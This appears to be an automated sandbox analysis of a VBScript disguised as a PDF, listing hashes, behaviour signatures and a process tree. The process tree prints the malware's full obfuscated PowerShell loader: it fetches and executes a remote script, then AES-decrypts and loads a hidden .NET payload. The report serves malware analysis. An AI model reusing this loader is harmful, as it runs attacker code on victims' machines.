Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15/02/2025, 04:15

General

  • Target

    Teufelberger,pdf.vbs

  • Size

    565KB

  • MD5

    9b98d98f1219f50085218002b9d6d13e

  • SHA1

    98f7f59822afb1b87f7d5308f07fcfb54fc3c970

  • SHA256

    01ed509842998f2309e2aa5ff2aaba7f12fec0e25c7a7a6f01d5d672c6a06363

  • SHA512

    3fff27a5923af1d7834aa193602bd5231b2f0c0e498d5f87ed232602ef9c61c19a5a8cc11ae7df7b0576169d363c00b7ded0bcd5c980198b60bef56d5554027b

  • SSDEEP

    12288:pJrrbl3eNvxisBksII3s+ngAHjQVbF7ywmL/KSapUd:Ld3eBweII3e+kxpBpS

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Teufelberger,pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\IXeqOHqsNh.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\system32\cmd.exe
        cmd /c "C:\Users\Admin\AppData\Local\Temp\IXeqOHqsNh.bat" min
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\IXeqOHqsNh.bat';$QfYeqOS='SpATtcwStlATtcwStiATtcwSttATtcwSt'.Replace('ATtcwSt', ''),'ReGpiKayZaGpiKayZdLiGpiKayZnGpiKayZeGpiKayZsGpiKayZ'.Replace('GpiKayZ', ''),'DezBQyDOPcozBQyDOPmpzBQyDOPrezBQyDOPsszBQyDOP'.Replace('zBQyDOP', ''),'MarfDGKORinrfDGKORMorfDGKORdurfDGKORlrfDGKORerfDGKOR'.Replace('rfDGKOR', ''),'CfXwBwRAreafXwBwRAteDfXwBwRAefXwBwRAcrfXwBwRAyptfXwBwRAorfXwBwRA'.Replace('fXwBwRA', ''),'CopMYtQoWiyTMYtQoWioMYtQoWi'.Replace('MYtQoWi', ''),'ChawEkUndknwEkUndkgewEkUndkEwEkUndkxwEkUndktewEkUndknsiwEkUndkowEkUndknwEkUndk'.Replace('wEkUndk', ''),'TxhGCEnLrxhGCEnLanxhGCEnLsfoxhGCEnLrmxhGCEnLFixhGCEnLnalxhGCEnLBxhGCEnLloxhGCEnLcxhGCEnLkxhGCEnL'.Replace('xhGCEnL', ''),'ERwiyYKNlRwiyYKNeRwiyYKNmeRwiyYKNntARwiyYKNtRwiyYKN'.Replace('RwiyYKN', ''),'GeJqilOHDtCuJqilOHDrrJqilOHDenJqilOHDtJqilOHDPrJqilOHDoceJqilOHDsJqilOHDsJqilOHD'.Replace('JqilOHD', ''),'InSFBzsDlvokSFBzsDleSFBzsDl'.Replace('SFBzsDl', ''),'EntmDkSfzVrymDkSfzVPomDkSfzVinmDkSfzVtmDkSfzV'.Replace('mDkSfzV', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JkRPTVVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaXdyIC1Vc2VCYXNpY1BhcnNpbmcgImh0dHBzOi8vMHgwLnN0LzhaZXkucHMxIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');function decrypt_function($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('ewMoxjcpzeNBZW19N7eS0/ZStjAsKH1ZQlG6Hp4+rlE=');$aes_var.IV=[System.Convert]::FromBase64String('GwaE+1wDAP4SIjKqb1sLhw==');$FAPRA=$aes_var.($QfYeqOS[4])();$cJMDe=$FAPRA.($QfYeqOS[7])($param_var,0,$param_var.Length);$FAPRA.Dispose();$aes_var.Dispose();$cJMDe;}function decompress_function($param_var){$OMBpZ=New-Object System.IO.MemoryStream(,$param_var);$ZMdDq=New-Object System.IO.MemoryStream;$ztAGx=New-Object System.IO.Compression.GZipStream($OMBpZ,[IO.Compression.CompressionMode]::($QfYeqOS[2]));$ztAGx.($QfYeqOS[5])($ZMdDq);$ztAGx.Dispose();$OMBpZ.Dispose();$ZMdDq.Dispose();$ZMdDq.ToArray();}$YZNls=[System.IO.File]::($QfYeqOS[1])([Console]::Title);$eOuee=decompress_function (decrypt_function ([Convert]::FromBase64String([System.Linq.Enumerable]::($QfYeqOS[8])($YZNls, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$eOuee).($QfYeqOS[11]).($QfYeqOS[10])($null,$null); "
          4⤵
            PID:2044
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3048

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\IXeqOHqsNh.bat

      Filesize

      565KB

      MD5

      fdf385474e086a6d6b1a034e86be995d

      SHA1

      34a1dff178fc6956271b930c636dfd66bce99fe1

      SHA256

      0842d522c1af86ffa47abb10ef60c9ea4c90c8ed912b9628edb33bcc4e11ae6d

      SHA512

      bb7f8b92d48174559b83f55bbe3f651f5be3720bb7ec54a654e37e2741a424ca69d72e446cd8acdaf9ee4d21d71c30306321724b26dac37237295a8e40b598c1

    • memory/3048-11-0x00000000029F0000-0x0000000002A30000-memory.dmp

      Filesize

      256KB

    • memory/3048-12-0x00000000029F0000-0x0000000002A30000-memory.dmp

      Filesize

      256KB